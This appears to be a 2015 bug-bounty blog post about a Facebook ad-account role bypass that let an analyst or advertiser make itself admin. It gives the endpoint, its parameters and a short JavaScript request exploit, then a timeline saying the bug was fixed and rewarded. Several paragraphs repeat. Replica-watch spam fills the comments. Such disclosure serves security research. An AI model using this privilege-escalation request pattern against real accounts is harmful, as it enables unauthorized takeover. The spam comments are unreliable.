Bypass ad account roles vulnerability 2015
2015
ads
bounty
bug
business
bypass
exploit
facebook
facebook exploit
hack
roles
vulnerability
3 comments
3 comments

I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account
admins in ad account can add any user to their ad account with these 3 type of role :
Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com
in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)
the vulnerability that I found, allow these agencies with normal role(2,3) change their own access to admin!
I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!
request body :
act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]
admins in ad account can add any user to their ad account with these 3 type of role :
- admin
- advertiser
- analyst
Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com
in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)
the vulnerability that I found, allow these agencies with normal role(2,3) change their own access to admin!
Scenario :
I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!
Details:
with analyst permission in any ad account send this request :
request url : facebook.com/ads/manage/settings/permissions/?action=add_user
act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]
Exploit :
var Xhr;
Xhr = new XMLHttpRequest ();
Xhr.open("POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)
POC :
I removed some section that used userid or email
Timeline:
- Mar 14, 2015 01:27am: Initial report
- Mar 17, 2015 03:35am: Bug acknowledged by security team
- Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
- Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.
great find
ReplyDeleteIch kaufte eine Kopie dieser Uhr für meinen Freund in diesem Online-Shop. Mein Freund liebt es. Er rühmte sich, dass diese Uhr fantastisch ist.
ReplyDeleteluxury copy watches
luxury watches
copy watches
Ik gebruik dit replica horloge is een zeer mooi en betaalbaar automatisch horloge, goede maat, Winkel voor luxe horlogeshoge kwaliteit,replica breitling horloges elegant en temperament, het is mijn favoriete stijl. Ik heb deze site gedeeld met mijn vrienden en ze waren erg blij.
ReplyDelete